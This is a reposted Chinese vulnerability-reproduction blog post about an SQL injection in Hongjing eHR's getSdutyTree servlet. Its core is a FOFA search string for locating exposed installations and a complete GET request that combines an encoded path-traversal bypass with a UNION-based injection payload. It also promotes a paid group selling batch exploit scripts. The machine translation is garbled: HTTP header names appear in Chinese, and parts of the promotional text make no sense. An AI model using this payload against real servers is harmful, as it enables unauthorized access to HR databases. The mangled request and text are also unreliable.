「漏洞复现」宏景eHR sduty/getSdutyTree SQL注入漏洞

「漏洞复现」宏景eHR sduty/getSdutyTree SQL注入漏洞0x01 免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用

0x01免责声明

因传播和使用本文提供的信息而产生的任何直接或间接的后果和损失均由用户自行承担,与作者无关。对此不承担任何责任。该工具来自互联网,并经过安全自测。如有侵权,请联系我们删除。本次测试仅用于教育目的,若用于非法目的,我们与平台及本文作者没有任何关系。你对此负责。

0x02产品介绍

宏晶eHR人力资源管理软件是一款集成人力资源管理和数字化应用的软件,以满足动态、协作、流程导向的战略需求。

0x03漏洞威胁

Honjing eHR /servlet/sduty/getSdutyTree 接口中存在SQL 注入漏洞,该漏洞可能允许未经身份验证的远程攻击者结合可能受控的数据库执行任意命令。经分析判断,该漏洞利用难度较大,建议您尽快修复。

0x04漏洞环境

FOFA:

app=\’HJSOFT-HCM\’

0x05漏洞复现

示范实验

GET /w_selfservice/oauthservlet/%2e./.%2e/servlet/sduty/getSdutyTree?param=childtarget=1codesetid=1codeitemid=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28120% 29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28119%29%2BCHAR%2885%29%2BCHAR%2873%29%2BCHAR%2887%29% 2BCHAR%2899%29%2BCHAR%2875%29%2BCHAR%28116%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%28107%29%2BCHAR%2889%29%2BCHAR% 28115%29%2BCHAR%28108%29%2BCHAR%2873%29%2BCHAR%2884%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%2875%29%2BCHAR%2883%29%2BCHAR%2898% 29%2BCHAR%28116%29%2BCHAR%28120%29%2BCHAR%2889%29%2BCHAR%2884%29%2BCHAR%2882%29%2BCHAR%28120%29%2BCHAR%2884%29%2BCHAR%28116%29% 2BCHAR%2888%29%2BCHAR%28112%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%28109%29%2BCHAR%28104%29%2BCHAR%2887%29%2BCHAR%28102%29%2BCHAR% 2897%29%2BCHAR%2877%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%2CNULL%2CNULL–+Iprd HTTP/1.1

Host:你的IP

用户代理: Mozilla/5.0(Macintosh;Intel Mac OS X 10.15;rv:125.0)Gecko/20100101 Firefox/125.0

Accept: 文本/html,应用程序/xhtml+xml,应用程序/xml;q=0.9,图像/avif,图像/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip、deflate、br

关闭连接:

0x06批量脚本验证

核核查脚本发布

知识星球:安全源于冷漠

0x07修复建议

关闭互联网暴露或访问界面设置

该软件现已发布安全修复更新,受影响的用户可以联系制造商获取补丁。

0x08加入我们

访问知识星球,获取更多关于漏洞和批量检测POC工具的信息。

知识星球:安全源于冷漠

交友并获得限时优惠券:加入即可享受25 折优惠

地球福利:每日更新最新的漏洞POC、文档、内部工具等。

《星球介绍》:

这个星球不会切大葱或将腐烂的食物扔到街上。欢迎来到免费卖淫。如果您不满意,我们将在3 天内退款。

这个星球提供攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训、安全标准等知识库,我们每天坚持分享。

这颗星的主人参与了十多个付费星球,定期收集优质资讯和星球分享工具。

“星球服务”:

当你加入一个星球时,你会得到:

批量验证漏洞POC脚本

0 天,共享1 天

收集和分享其他付费星球的资源

海量红蓝战斗资源

很棒的内部红色和蓝色工具和插件

伟大而全面的wiki 和漏洞库

问题及技术交流

#《漏洞复现》宏景eHR sduty/getSdutyTree 以上SQL注入漏洞相关内容来源于互联网,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93361.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月6日 上午11:51
下一篇 2024年7月6日 上午11:51

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注